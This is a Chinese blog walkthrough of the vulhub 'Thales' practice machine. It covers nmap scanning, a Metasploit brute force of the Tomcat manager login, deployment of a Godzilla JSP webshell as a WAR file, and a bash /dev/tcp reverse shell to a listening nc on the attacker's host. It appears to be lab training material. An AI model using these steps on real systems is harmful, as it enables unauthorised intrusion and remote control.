当前位置: 首页 > news >正文

vulhub靶场Thales通关攻略

news 来源:原创 2025/6/3 22:50:24

环境配置

靶机和攻击机(kali)都设置为桥接模式,记住靶机的MAC地址

nmap扫ip

根据MAC地址判断靶机ip为172.16.2.32

nmap扫端口

发现开启了22和8080两个端口

访问http://172.16.2.32:8080

发现是tomcat的页面

点击右侧的按钮

弹出了登录框

在kali使用msf爆破

启动msf

msfconsole

search tomcat login

use 0

show options

set rhosts 172.16.2.32

run两次后成功爆出账号密码

tomcat:role1

登录进入后台界面

点击左上角管理器应用程序列表

部署war包

这里上传哥斯拉jsp木马(压缩为zip改后缀为war)

上传了gsl.war,其中的文件叫shell.jsp,我们木马在/gsl目录下(重启了一下ip变了)

哥斯拉连接成功,命令执行

kali开启nc监听

nc -lvvp 6666

哥斯拉命令执行输入

/bin/bash -c 'bash -i >& /dev/tcp/172.16.2.36/6666 0>&1'

反弹成功

相关文章:

  • 记20个忘10个之九:后缀-th
  • 5.go切片和map
  • SAP错题集
  • Spring MVC:从历史演变到实战入门
  • 【react18】react项目使用mock模拟后台接口
  • cmd命令查看电脑的CPU、内存、存储量
  • 简记_单片机硬件最小系统设计
  • 《金庸群侠传》游戏秘籍
  • 加载huggingface数据集报token无效错误解决方案
  • PhotoShop学习02
  • 代码随想录刷题day52|(二叉树篇)106.从中序与后序遍历序列构造二叉树
  • C++中将记录集的数据复制到Excel工作表中的CRange类CopyFromRecordset函数异常怎么捕获
  • 科技赋能,高端气膜料仓重塑储存新标准—轻空间
  • 32位汇编:MASM32环境搭建与汇编窗口程序
  • 基于Babylon.js的Shader入门之六:让Shader反射环境贴图
  • 第30周Java分布式入门 线程池
  • Docker镜像迁移方案
  • 在STM32F7上实现CAN总线收发队列
  • MongoDB 与 Elasticsearch 使用场景区别及示例
  • 在 React 中,组件之间传递变量的常见方法
  • 免费域名网站建设/kj6699的seo综合查询
  • 北京南昌网站建设/百度助手官网
  • 龙华民治网站建设公司/兰州疫情最新情况
  • 相亲网站男人拉我做外汇/广点通投放平台
  • 福田瑞沃轻卡/开源seo软件
  • 大连软件公司排名/seo试用软件